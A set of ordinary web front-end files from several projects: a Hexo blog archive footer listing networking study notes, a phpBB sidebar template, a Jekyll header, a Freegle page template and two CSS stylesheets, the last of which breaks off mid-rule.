href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/02/27/TCP连接的建立和终止/" class="archive-article-date"> <time datetime="2015-02-27T03:34:10.000Z" itemprop="datePublished">2月 27</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/02/27/TCP连接的建立和终止/">TCP连接的建立和终止</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/network/">network</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/02/20/VLAN/" class="archive-article-date"> <time datetime="2015-02-20T02:13:09.000Z" itemprop="datePublished">2月 20</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/02/20/VLAN/">VLAN</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/network/">network</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/02/19/Route/" class="archive-article-date"> <time datetime="2015-02-19T13:05:19.000Z" itemprop="datePublished">2月 19</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/02/19/Route/">路由器工作原理及数据流分析</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/network/">network</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/01/17/Net&&Switsh/" class="archive-article-date"> <time datetime="2015-01-17T08:08:21.000Z" itemprop="datePublished">1月 17</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/01/17/Net&&Switsh/">网络三要素及交换机工作原理</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/network/">network</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> </div></section> </div> <footer id="footer"> <div class="outer"> <div id="footer-info"> <div class="footer-left"> &copy; 2016 Oylwhu Blog </div> <div class="footer-right"> <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/litten/hexo-theme-yilia" target="_blank">Yilia</a> by Litten </div> </div> </div> </footer> </div> <link rel="stylesheet" href="/fancybox/jquery.fancybox.css" type="text/css"> <script> var yiliaConfig = { fancybox: true, mathjax: true, animate: true, isHome: false, isPost: false, isArchive: true, isTag: false, isCategory: false, open_in_new: false } </script> <script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js" type="text/javascript"></script> <script src="/js/main.js" type="text/javascript"></script> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ tex2jax: { inlineMath: [ ['$','$'], ["\\(","\\)"] ], processEscapes: true, skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'] } }); MathJax.Hub.Queue(function() { var all = MathJax.Hub.getAllJax(), i; for(i=0; i < all.length; i += 1) { all[i].SourceElement().parentNode.className += ' has-jax'; } }); </script> <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"> </script> </div> </body> </html>
styles/all/template/event/overall_header_content_before.html
GerB/cmbb
<!-- IF CMBB_LEFTBAR --> <div id="content-wrapper"> <div id="cmbb_leftbar" class="cmbb_sidebar"> <!-- EVENT ger_cmbb_leftbar_prepend --> <div id="login"> <!-- IF S_USER_LOGGED_IN --> <h3>{S_WELCOME_USER}</h3> <p>(<a href="{U_LOGIN_LOGOUT}" title="{L_LOGIN_LOGOUT}">{L_LOGIN_LOGOUT}</a>)</p> <!-- IF S_CAN_EDIT --> <p><a href="{U_NEW_ARTICLE}" class="button" alt="{L_NEW_ARTICLE}"><span>{L_NEW_ARTICLE}</span> <i class="icon fa-asterisk fa-fw" aria-hidden="true"></i></a></p> <!-- IF U_EDIT_ARTICLE --> <p><a href="{U_EDIT_ARTICLE}" class="button" alt="{L_EDIT_ARTICLE}"><span>{L_EDIT_ARTICLE}</span> <i class="icon fa-pencil fa-fw" aria-hidden="true"></i></a></p> <!-- ENDIF --> <!-- ENDIF --> <!-- IF S_CAN_SEE_HIDDEN --> <!-- IF S_HIDDEN --> <p><a href="{U_HIDDEN}" class="button" alt="{L_SHOW_HIDDEN}"><span>{L_SHOW_HIDDEN}</span> <i class="icon fa-recycle fa-fw icon-green" aria-hidden="true"></i></a></p> <!-- ELSE --> <p><span class="button"><span>{L_NO_HIDDEN}</span> <i class="icon fa-recycle fa-fw icon-gray" aria-hidden="true"></i></span></p> <!-- ENDIF --> <!-- ENDIF --> <!-- ELSE --> <form method="post" action="{U_LOGIN_LOGOUT}"> <h3>{L_LOGIN}{L_COLON}</h3><br /> <fieldset> <p><label for="username">{L_USERNAME}{L_COLON}</label> <input type="text" id="username" name="username" /></p> <p><label for="password">{L_PASSWORD}{L_COLON}</label> <input type="password" id="password" name="password" /></p> <p><label for="autologin" style="width: 100%"><input type="checkbox" id="autologin" name="autologin" />{L_LOG_ME_IN}</label></p> <input type="submit" class="button2" value="{L_LOGIN}" name="login" /></p> <input type="hidden" name="redirect" value="{U_LOGIN_REDIRECT}" /> </fieldset> </form> <!-- ENDIF --> </div> <!-- IF latest_topic_feed --> <div id="topiclist"> <h3>{L_FEED_TOPICS_NEW}</h3><br /> <ul class="lt"> <!-- BEGIN latest_topic_feed --> <li class="lt"><a href="{latest_topic_feed.U_TOPIC}">{latest_topic_feed.TOPIC_TITLE}</a> </li> <!-- END latest_topic_feed --> </ul> </div> <!-- ENDIF --> <div id="stats"> <h3>{L_STATISTICS}</h3> <p><a href="{U_VIEWONLINE}">{L_WHO_IS_ONLINE}</a>{L_COLON}<br />{USERS_ONLINE}</p> <p>{USERS_TOTAL}<br />{USER_NEWST}</p> </div> <!-- EVENT ger_cmbb_leftbar_append --> <!-- IF S_SHOW_RIGHTBAR --> <div id="responsive_rightbar">{CMBB_RIGHTBAR_CONTENT}</div> <!-- ENDIF --> </div> <!-- ENDIF -->
_includes/header.html
statkclee/open-source-for-business
<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="stylesheet" type="text/css" href="http://statkclee.github.io/swcarpentry-version-5-3-new/css/bootstrap/bootstrap.css" /> <link rel="stylesheet" type="text/css" href="http://statkclee.github.io/swcarpentry-version-5-3-new/css/bootstrap/bootstrap-theme.css" /> <link rel="stylesheet" type="text/css" href="http://statkclee.github.io/swcarpentry-version-5-3-new/css/swc.css" /> <link rel="alternate" type="application/rss+xml" title="Software Carpentry Blog" href="http://software-carpentry.org/feed.xml"/> <meta charset="UTF-8" /> <!-- HTML5 shim, for IE6-8 support of HTML5 elements --> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]-->
http/template/user/give/whatnext.html
nicksellen/iznik
<h1 class="text-center">Thanks for freegling!</h1> <p class="text-center text-larger">We've put your offer on:</p> <div class="js-group" /> <h1 class="text-center">What next?</h1> <p class="text-center topspace"> We'll let people know about your item, and contact you when people are interested. You can promise your item to whoever you want, but we encourage you to use our <em><b>Fair Offer Policy</b></em>: <div class="row alert alert-info"> <div class="col-xs-2"> <input type="checkbox" class="form-control js-fop" checked /> </div> <div class="col-xs-10"> I agree to take a while before choosing who gets this. This gives people who aren't online all the time a fair chance to reply. </div> </div> </p> <div class="topspace strike"> <span></span> </div> <div class="clearfix"/> <div class="row-fluid topspace"> <div class="col-md-6"> <a href="/give"> <div class="topspace btn btn-lg btn-block btn-info"> <div class="glyphicon glyphicon-gift" />&nbsp;Give something else </div> </a> </div> <div class="col-md-6"> <a href="/find"> <div class="topspace btn btn-lg btn-block btn-primary"> <div class="glyphicon glyphicon-search" />&nbsp;Find something </div> </a> </div> </div> <div class="row-fluid topspace js-loggedoutonly reallyHide"> <p class="text-center topspace botspace">If you'd like to explore:</p> <div class="col-xs-4 col-xs-offset-4 text-center"> <button class="btn btn-white js-signin margtop">Sign in</button> </div> </div> <div class="row-fluid topspace js-loggedinonly reallyHide"> <div class="col-xs-4 col-xs-offset-4 text-center"> <a href="/"> <button class="btn btn-white margtop">Continue to Home Page</button> </a> </div> </div>
style.css
toppa/Toppa-WordPress-Theme
/* Theme Name: Toppa Theme URI: http://toppa.com/toppa-wordpress-theme Author: toppa Author URI: http://toppa.org/ Description: Loosely based on the no longer available "Sustainable" theme. Version: 1.0 License: GNU General Public License v2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Tags: blue, orange, white, fixed width, two columns, widgets Text Domain: toppa */ @font-face { font-family: 'Museo'; src: url('fonts/Museo300-Regular-webfont.eot'); src: local('?'), url('fonts/Museo300-Regular-webfont.woff') format('woff'), url('fonts/Museo300-Regular-webfont.ttf') format('truetype'), url('fonts/Museo300-Regular-webfont.svg#webfont1KESbbSN') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'MuseoSans'; src: url('fonts/MuseoSans_300-webfont.eot'); src: local('?'), url('fonts/MuseoSans_300-webfont.woff') format('woff'), url('fonts/MuseoSans_300-webfont.ttf') format('truetype'), url('fonts/MuseoSans_300-webfont.svg#MuseoSans300Regular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'MuseoSansItalic'; src: url('fonts/MuseoSans_300_Italic-webfont.eot'); src: local('?'), url('fonts/MuseoSans_300_Italic-webfont.woff') format('woff'), url('fonts/MuseoSans_300_Italic-webfont.ttf') format('truetype'), url('fonts/MuseoSans_300_Italic-webfont.svg#MuseoSans300Italic') format('svg'); font-weight: normal; font-style: normal; } html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } body { background: #c2e7ed url(images/bg.gif) repeat-x; text-rendering: optimizeLegibility; font-family: 'MuseoSans', Verdana, sans-serif; color:#4f647b; font-size: 16px; line-height: 1.5em; } em, i { font-family: 'MuseoSansItalic', Verdana, sans-serif; } strong, b { font-weight: bolder; } small { font-size: 0.5em; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } ol, ul { list-style: none; } table { border-collapse: collapse; border-spacing: 0; } img { border: 0; } a { color: #4f647b; } pre { font-family: Consolas, Monaco, 'Courier New', Courier, monospace; margin-bottom: 1em; padding: .5em; background: #ffffff none repeat scroll 0 0; border: 1px solid #eeeeee; overflow: auto; } code { font-family: Consolas, Monaco, 'Courier New', Courier, monospace; } h1, h2, h3, h4, h5, h6 { color: #ff9600; font-family: 'Museo', Tahoma, sans-serif; font-style: normal; font-weight: bold; line-height: 1em; } h2 a, h3 a, h4 a, h5 a, h6 a { color: #ff9600; text-decoration: none; } h2 a:hover, h3 a:hover, h4 a:hover, h5 a:hover, h6 a:hover { text-decoration: underline; } h1 { font-size: 3em; /* 48px / 16px */ } h1, h1 a { color: #7b684f; text-decoration: none; } h2 { font-size: 2em; /* 32px / 16px */ } h3 { font-size: 1.5em; /* 24px / 16px */ } h4 { font-size: 1.25em; /* 20px / 16px */ } h5 { font-size: 1.125em; /* 18px / 16px */ } h6 { font-size: 1em; /* 16px / 16px */ } p { margin: 1em 0; /* 28px / 16px */ } td, th { padding: .4em; } dd { margin-left: 1.5em; /* 20px / 16px */ } input[type='text'], input[type='submit'], textarea { font-size: 1em; font-family: 'MuseoSans', Verdana, sans-serif; color:#4f647b; line-height: 1.5em; } .clearfix:after { content: "."; visibility: hidden; display: block; height: 0; clear: both; } #page-container { margin: 2em auto; /* 32px / 16px */ width: 90%; } #page { margin: 0 auto; width: 93.75%; /* 900px / 960px */ } #masthead { margin: 1.5em 4.444444444444%; /* 40px / 900px */ position: relative; } #masthead-title { /*float: left;*/ } #masthead h1 { display: inline; } #subtitle { display: inline; margin-left: .5em; font-weight: bold; } #masthead-nav { position: absolute; bottom: 2px; right: 0; font-size: 0.875em; /* 14px / 16px */ white-space: nowrap; } #masthead-nav a { padding: 0 0.1em; } #welcome { margin: 0 4.444444444444%; /* 40px / 900px */ width: 100%; } .welcome-category { width: 27.33333%; float: left; } .welcome-gutter { width: 3%; float: left; padding: 0.5em; } .welcome-category p { margin-top: 0; } .welcome-image { max-width: 100%; height: auto; border: thin solid #ff9600; } .welcome-category ul { margin-right: 1.5em; font-size: 0.875em; /* 14px / 16px */ } #welcome-footer { text-align: center; margin: 1.5em 0; } #welcome-footer a { color:#4f647b; } #welcome-footer + #footer { font-size: 0.75em; /* 12px / 16px */ } #content { background-color: #ffffff; -moz-border-radius: 1em; -webkit-border-radius: 1em; border-radius: 1em; } #article-container { float: left; width: 68%; /* 612px / 900px */ } .article { padding: 2.5em 6.535947712418% 0; /* 40px / 612px */ } .article-content { position: relative; /* for positioning Publicize icons */ } .article-content .sharedaddy { position: absolute; bottom: -4.2em; left: 0.9em; } .article-content .sharedaddy .sd-block { border: none; padding: 0; } .article-content .sharedaddy .sd-content { width: auto; float: none; margin: 0; } .article-content ul, #comments ul, .welcome-category ul, .yarpp-related ul { list-style: square; } .article-content ol, #comments ol { list-style: decimal; } .article-content ul, .article-content ol, #comments ul, #comments ol, .welcome-category ul, .yarpp-related ul { margin-left: 1em; } .article-content li, #comments li { margin: 1em 0; /* 28px / 16px */ } .byline { font-size: 1.125em; /* 18px / 16px */ } .article blockquote, #comments blockquote { padding-left: .8em; border-left: 6px solid #FFD396; } .article-attachment { text-align: center; } .article-attachment h2 { color: #7b684f; } .article-footer { background: #e4edf8; text-align: right; padding: 0.5em; margin: 1em 0 1.5em; font-size: 0.875em; /* 14px / 16px */ } .article-footer img { vertical-align: middle; } .article-footer li { display: inline; border-right: 1px solid #4f647b; padding-right: 0.5em; padding-left: 0.25em; } .article-footer li:last-child { border-right: 0; } .article-nav, .archive-heading { padding: 0.5em 6.535947712418%; /* 40px / 612px */ font-size: 0.75em; /* 12px / 16px */ } .archive-heading { font-size: 1em; font-weight: bold; color: #ff9600; } .article-nav-single { padding-bottom: 0; } .article-nav-left { float: left; white-space: nowrap; } .article-nav-right { float: right; white-space: nowrap; } .yarpp-related li { margin: 0.5em 0; } .search-results h2 { padding: 1em 6.535947712418% 0; /* 40px / 612px */ } .search-results .byline { font-size: 0.875em; /* 14px / 18px */ margin-top: 0; } #comments { padding: 0.5em 6.535947712418% 1em; /* 40px / 612px */ } .comment-list .children li { padding-left: 1em; border-left: 4px solid #4f647b; } #reply-title { margin: 1em 0; } #commentform { margin-bottom: 1em; } #sidebar-container { float: right; width: 32%; /* 288px / 900px */ } #sidebar { padding: 2.5em 13.888888888889%; /* 40px / 16px --- 40px / 288px */ } #sidebar-nav li { position: relative; padding: .5em 1em; background-color: #e4edf8; font-weight:bold; border-bottom: 1px solid #ffffff; } .nav-arrow-left { display: none; } #sidebar-nav li a { text-decoration:none; } #sidebar-nav li:hover { background-color: #dce8f8; } #sidebar-nav .current-cat, #sidebar-nav .current-cat:hover { background-color: #d4e1f2; } .current-cat .nav-arrow-left { display: block; position: absolute; width: 0; height: 0; border-top: 10px solid transparent; border-bottom: 10px solid transparent; border-right: 10px solid #d4e1f2; top: 0.6em; left: -0.6em; } .nav-rss { display: block; float: right; } .nav-rss img { vertical-align: text-top; } .search { background: #f1f1f1; padding: .5em 1em; border-bottom: 1px solid #ffffff; } .search input[type='text'] { margin-right: 0.25em; width: 75%; padding: 0.25em; } .search input[type='image'] { display: block; float: right; margin: 0.5em 0 0 0; } #sidebar-content { background:#e3e3e3; padding: 1em; } #sidebar-content h2 { color: #4f647b; font-size: 1.25em; /* 18px / 16px */ } #sidebar-content ul ul { margin: 0.5em 0 1.25em 1.25em; list-style: square; font-size: 0.875em; /* 14px / 16px */ } .random-post-date { font-size: 0.71428571428571em; /* 10px / 14px */ } #footer { margin-top: 0.5em; text-align: center; } #footer ul li { display: inline; margin-right: 1em; } #footer ul li:last-child { margin-right: 0; } .archive { margin-top: 1em; width: 50%; float: left; } @media screen and (max-width: 1200px) { #subtitle { display: block; margin-left: 0; margin-top: 0.5em; } .welcome-category h2 { font-size: 1.5em; /* 24px / 16px */ } } @media screen and (max-width: 1050px) { #article-container { width: 100%; } #sidebar-container { float: left; width: auto; } .welcome-category { width: 100%; margin-bottom: 1em; } .welcome-category h2 { font-size: 2em; /* 32px / 16px */ } .welcome-gutter { display: none; } #welcome-footer, #welcome-footer + #footer { text-align: left; margin: 0.5em 4.444444444444%; /* 40px / 900px */ } } @media screen and (max-width: 990px) { #masthead { position: static; } #masthead h1 { margin-right: 1em; /* pushes down masthead-nav before it gets too close */ } #masthead-nav { position: static; bottom: auto; right: auto; float: left; line-height: 1em; margin-top: 1em; } } @media screen and (max-width: 700px) { .article-footer { padding-top: 3em; } }
wp-content/cache/css/static/326c545baad43b77d335e6efcec6bb18.css
AndyHuntDesign/andyhuntdesign
/* Monday 1st of June 2015 10:11:10 PM*/ /* Monday 1st of June 2015 10:11:10 PM*/ div#nextend-smart-slider-4 .smart-slider-animate-fade.smart-slider-animate-in { z-index: 3; } div#nextend-smart-slider-4 .smart-slider-animate-fade.smart-slider-animate-out { z-index: 2; } div#nextend-smart-slider-4 .smart-slider-animate-slide.smart-slider-animate-in { z-index: 2; opacity: 1; } div#nextend-smart-slider-4 .smart-slider-animate-slide.smart-slider-animate-out { z-index: 3; opacity: 1; } div#nextend-smart-slider-4 { margin: 0px 0px 0px 0px; position: relative; } div#nextend-smart-slider-4 * { font-size: inherit; line-height: inherit; } div#nextend-smart-slider-4 *, div#nextend-smart-slider-4 *:before, div#nextend-smart-slider-4 *:after { -moz-box-sizing: content-box; box-sizing: content-box; } div#nextend-smart-slider-4.nextend-slider-fadeload { position: absolute; opacity: 0; -webkit-transition: opacity 0.3s ease-in-out; -moz-transition: opacity 0.3s ease-in-out; transition: opacity 0.3s ease-in-out; } div#nextend-smart-slider-4.nextend-slider-fadeload.nextend-loaded { opacity: 1; position: relative; } div#nextend-smart-slider-4 a, div#nextend-smart-slider-4 a:focus { outline: none !important; } div#nextend-smart-slider-4 h1, div#nextend-smart-slider-4 h2, div#nextend-smart-slider-4 h3, div#nextend-smart-slider-4 h4, div#nextend-smart-slider-4 h5, div#nextend-smart-slider-4 h6, div#nextend-smart-slider-4 p { margin: 0; padding-left: 0; padding-right: 0; height: auto; width: auto; border: 0; box-shadow: none; } div#nextend-smart-slider-4 img { box-shadow: none; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; background: transparent; background: none; padding: 0; margin: 0; border: 0; } div#nextend-smart-slider-4 .smart-slider-canvas { position: relative; } div#nextend-smart-slider-4 .smart-slider-canvas, div#nextend-smart-slider-4 .smart-slider-layer { overflow: hidden !important; } div#nextend-smart-slider-4 .smart-slider-canvas-inner { position: relative; width: 100%; height: 100%; } div#nextend-smart-slider-4 .sliderfont1 { color: #ffffff;font-size:320%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont1 a, div#nextend-smart-slider-4 .sliderfont1 a:LINK, div#nextend-smart-slider-4 .sliderfont1 a:VISITED, div#nextend-smart-slider-4 .sliderfont1 a:FOCUS, div#nextend-smart-slider-4 .sliderfont1 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont1 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont2 { color: #000000;color: RGBA(0,0,0,0.86);font-size:320%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont2 a, div#nextend-smart-slider-4 .sliderfont2 a:LINK, div#nextend-smart-slider-4 .sliderfont2 a:VISITED, div#nextend-smart-slider-4 .sliderfont2 a:FOCUS, div#nextend-smart-slider-4 .sliderfont2 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont2 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont3 { color: #ffffff;font-size:170%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont3 a, div#nextend-smart-slider-4 .sliderfont3 a:LINK, div#nextend-smart-slider-4 .sliderfont3 a:VISITED, div#nextend-smart-slider-4 .sliderfont3 a:FOCUS, div#nextend-smart-slider-4 .sliderfont3 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont3 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont4 { color: #000000;color: RGBA(0,0,0,0.86);font-size:170%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont4 a, div#nextend-smart-slider-4 .sliderfont4 a:LINK, div#nextend-smart-slider-4 .sliderfont4 a:VISITED, div#nextend-smart-slider-4 .sliderfont4 a:FOCUS, div#nextend-smart-slider-4 .sliderfont4 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont4 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont5 { color: #ffffff;font-size:114%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont5 a, div#nextend-smart-slider-4 .sliderfont5 a:LINK, div#nextend-smart-slider-4 .sliderfont5 a:VISITED, div#nextend-smart-slider-4 .sliderfont5 a:FOCUS, div#nextend-smart-slider-4 .sliderfont5 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont5 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont6 { color: #000000;color: RGBA(0,0,0,0.86);font-size:114%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont6 a, div#nextend-smart-slider-4 .sliderfont6 a:LINK, div#nextend-smart-slider-4 .sliderfont6 a:VISITED, div#nextend-smart-slider-4 .sliderfont6 a:FOCUS, div#nextend-smart-slider-4 .sliderfont6 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont6 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.4;font-weight: normal;font-style: normal;text-decoration: none;text-align: justify;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont7 { color: #ffffff;font-size:90%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont7 a, 